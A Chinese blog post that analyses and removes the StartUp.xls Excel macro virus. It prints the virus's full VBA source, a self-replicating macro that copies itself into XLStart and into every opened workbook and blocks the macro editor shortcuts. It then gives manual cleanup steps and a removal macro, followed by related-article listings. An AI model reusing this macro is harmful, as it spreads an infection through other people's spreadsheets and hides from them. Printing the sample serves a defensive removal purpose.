遭遇StartUp.xls宏病毒

最新推荐文章于 2021-01-26 09:28:07 发布
最新推荐文章于 2021-01-26 09:28:07 发布
阅读量679 收藏
点赞数
文章标签: Excel VBA 360 Microsoft C
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/benwdm/article/details/83696521
版权

今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主要是自己学艺不精)。

病毒样本如下:

Sub auto_open()
    On Error Resume Next
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
        Application.ScreenUpdating = False
        ThisWorkbook.Sheets("StartUp").Copy
        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
        n$ = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks("StartUp.xls").Save
        Workbooks(n$).Close (False)
    End If
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
    On Error Resume Next
    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
        Application.ScreenUpdating = False
        n$ = ActiveSheet.Name
        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
        Sheets(n$).Select
    End If
End Sub
Sub back()
    On Error Resume Next
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
    Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Sub escape()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
            book.Close
        End If
    Next
End Sub

 

通过参考网上一些资料,采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开,没有试验,不知是真是假):

一、删除

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls

,该文件删除后,Excel会自动重建的;

 

二、删除

C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls

 

三、新建一个空的StartUp.xls,然后录制宏(随便录,只是为了能打开VBA编辑器);

 

四、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:

Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    'Dim delComponent As VBComponent 网上有人贴的代码里有这句,经实测,这句会导致编译错误。VBA中没有VBComponent对象
    Name = "StartUp"
    For Each book In Workbooks
        Set delComponent = book.VBAProject.VBComponents(Name)
        book.VBAProject.VBComponents.Remove delComponent
    Next
End Sub

 五、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。

benwdm
关注
StartUp宏病毒专杀(永久使用)
06-13
本工具用于专杀ExcelStartUp宏病毒。运行前提:1、把安全性设为低;2把“可靠运行商”的“信任对于Visual Basic项目的访问”勾上。 对前一版本(链接:http://download.csdn.net/detail/a10615/3966065)进行了更新。把使用的期限取消了,可以永久性地使用。还作了些其他修改。
StartUp宏病毒专杀
12-24
本工具用于专杀ExcelStartUp宏病毒。运行前提:1、把安全性设为低;2把“可靠运行商”的“信任对于Visual Basic项目的访问”勾上
EXCEL startup.exe 宏病毒
weixin_34411563的博客
11-13 212
StartUp.xls宏病毒清除方法 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; 第二步:清除C:\Documents and Settings\administrator\Application Data\Micr...
StartUp.xls宏病毒清除方法(excel宏病毒
IT经验分享
02-09 2964
StartUp.xls宏病毒清除方法(excel宏病毒)   求教高手该代码运行为什么会出现“用户定义类型未定义”编译错误,如何解决?多谢 Visual basic 编辑器---------工具--------引用-------Microsoft VisualBasic For Applications Extensibility 5.3   (防止宏病毒代码,未测试) Sub a
startup宏病毒专杀防疫工具
10-09
startup 宏病毒专杀防疫工具 1 、本工具在EXCEL2003,excel2007和excel2010版本均适用。 2 、使用方法: A、打开附件中"宏病毒免疫工具v1.0.xls"(打开时启用宏),点击"允许删除恶意代码"按钮,然后执行文件菜单(2007用户点OFFICE按钮)--另存为,类型选“...加载宏”,路径默认即可。 B、excel2003用户:工具菜单-加截宏-选中“宏病毒免疫工具v1.0”后确定即可。 excel2007用户:左上角的office按钮--最下面找到“选项”---加载项---在最下面点击“管理加载项”后面的"转到"按钮,在打开的加载宏窗口中选中"宏病毒免疫工具v1.0",然后确定。 C、当发现有可疑文件时会弹出提示,如果不认识点击删除即可。在发现可疑代码时也会有提示信息。因为病毒使用的代码我们平时很少用,所以直接点“是”即可删除病毒代码。 3、测试文件使用: 测试文件只是写了一个简单的毫无危害的小程序,如果你的工具加宏完成后,可以打开测试文件,启用宏后会不会弹出一个“宏病毒代码警告”(删除不删除都没关系),如果出现则说明本工具正在工作状态中,一般的宏病毒就不再会侵入你的电脑了。
StartUp.xls宏病毒专杀
01-04
近来StartUp.xls宏病毒导致很多EXCEL用户怨声载道,此专杀工具可以将其杀之,StartUp.xls宏病毒是通过EXCEL文件传播,如果您的EXCEL的宏安全保护设置过低,打开带病毒的EXCEL文件将会中毒,中毒后不管是打开还是新建...
StartUp.xls 查杀Excel宏病毒
01-09
Excel中了宏病毒之后以下方法可以使用可以试试屡试不爽。 怎样查杀Excel宏病毒“Starup”、“results”,看看这个也许给我答案
清除宏病毒(StartUp.xls).pdf
12-13
### 清除宏病毒(StartUp.xls):详解与步骤 #### 一、宏病毒简介 宏病毒是一种利用Microsoft Office等应用程序中的宏功能来传播的恶意软件。它们通常隐藏在文档或工作簿中,当用户打开这些文件时,宏会自动执行,...
打开EXCEL时无法找到startup.xls文件的解决方法.docx
09-27
StartUp.xls宏病毒通常通过电子邮件附件、不安全的下载链接或者被感染的U盘传播。 解决这个问题的步骤包括: 1. 清除宏病毒文件: 首先,你需要找到可能被病毒感染的文件。在计算机中搜索“xlstart”文件夹,通常...
StartUp.xls excel表格宏病毒 专杀&免疫工具
04-19
excel表格中由于宏安全性底中的StartUp病毒,出现BOOK1、不能保存、文件打开损坏等问题。
Excel startup 宏病毒专杀
05-31
公司某些员工的Excel感染了Startup宏病毒, 杀毒软件查不出来. 手工清理很麻烦, 写了个专杀. 很粗糙的作品, 需要事先手工打开Excel"工具"=>宏=>"安全性"=>"高", "可靠发行商"=>"信任对于VB项目的访问" 因为要通过程序改这个安全级别必须得修改注册表才行, 有时会被安全软件阻挡,所以就懒得弄了, 大家手工设一下吧. 菜单里可以自行设定要扫描的EXCEL模块名称和模块内部代码. 很简单的一个东西, 大部分时间花在程序构架上了, 核心内容就是查找字符串而已, 网上到处都有的东西东拼西凑出来的代码就不贴出来了. 大家有Excel宏病毒的可以自己抓一下样本在程序菜单里设定一下,自行查杀. 菜单调出"关键模块名"和"关键命令"的文本框编辑好之后,可以双击文本框保存. 双击表格可以清空上次查杀的结果重新开始
StartUp.xls 专杀&免疫工具
06-11
StartUp.xls 宏病毒专杀&免疫工具
startup.xls病毒解决办法
01-18
startup.xls病毒解决办法 先搜索excel安装目录里的startup.xls,然后用下载这个文件,覆盖他即可。
自制StartUp宏病毒专杀小工具
热门推荐
Ralap Zhong的专栏
12-25 1万+
StartUp宏病毒,是我从公司里看到的。危害性不大,它不会删除你任何资料,但讨厌的一点就是一直自我繁殖,让你的文件很大,而且任何Excel一打开都会传染。不熟悉Excel的人,可能不知道自己是否中毒。可以根据此操作查看(Excel 2003为例):工具——宏——Visual Basic编辑器,打开后如果发现有“StartUp.xls”工作簿,或模块中有“StartUp*”之类的模块,或工作表中多
office 宏病毒分析
CMC_HHM的博客
03-25 2061
1、样本信息 在网上下载样本,是一个word的宏病毒 名称 713-288-4192.doc MD5 61F1A99292A199F867B168B76FC8CC74 SHA1 967DA912065D014C275463917D236836967B27CA CRC32 A117A12E 2、分析工具准备 在linux平台下安装 安装依赖包 wget...
记一个宏病毒样本
WLINX
12-09 2476
在未知的道路上越来越菜——2019.10.18 拿到一个新样本,却连最基本的宏病毒都没分析清楚,是真的菜,首先,分析要有一个方向,方向错了,便会浪费很多时间,而从事安全这个行业,时间是异常宝贵的。所以,感觉自己需要写一篇博客来提醒自己...... 1、提取宏 首先这是一个宏病毒,多的不说,如果不想观察宏病毒的动态行为,就没必要打开宏病毒,用工具提取。前提是你得先装工具。 然后查看宏,心...
宏病毒分析
weixin_44156885的博客
10-25 1659
文章目录基本信息一,概述二,流程图三,技术细节详细分析宏exchangeX.dll61B00.dll进程行为注册表行为网络行为四,样本溯源五,查杀&恢复方案六,防护建议 基本信息 FileName FileType FileSize packer MD5 sample4.xls 宏病毒 338 KB no 3effeba64d9a1a4dd1bddaeb1858e4d0 ...
新型K4宏病毒代码分析报告
ccx_john的专栏
10-01 3690
最近据说是新型的K4宏病毒到处肆虐,感染了办公室不少.xls文件,杀又杀不干净。对此互比较感兴趣,花了点时间跟踪了一下代码,并作了简要注释,基本了解该病毒的行为:   以ToDOLE模块中的代码,在虚拟机XP+Excel2003下跟踪并注释了关键代码:   '病毒行为主过程   Private Sub auto_open()   Application.DisplayAle
获取程序当前运行的文件夹路径“Application.StartupPath”,在类库项目中无法使用的解决方案
qq_18975227的博客
01-26 4504
通常我们WinForm编程时,要获取程序当前运行的文件夹路径会用Application.StartupPath ,但是Application.StartupPath在编写类库项目时却无法使用,因为我们根本无法用using System.Windows.Forms;来引入Application.StartupPath 的命名空间,这个时侯我们要用AppDomain.CurrentDomain.BaseDirectory。 private static string fullPathFileName = App
Excel宏病毒清除指南:StartUp.xls方法
"该资源提供了一种清除Excel宏病毒的方法,特别是针对名为'StartUp.xls'的病毒样本。" Excel宏病毒是一种特殊类型的恶意软件,它利用Microsoft Excel的内置编程语言VBA(Visual Basic for Applications)来创建、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值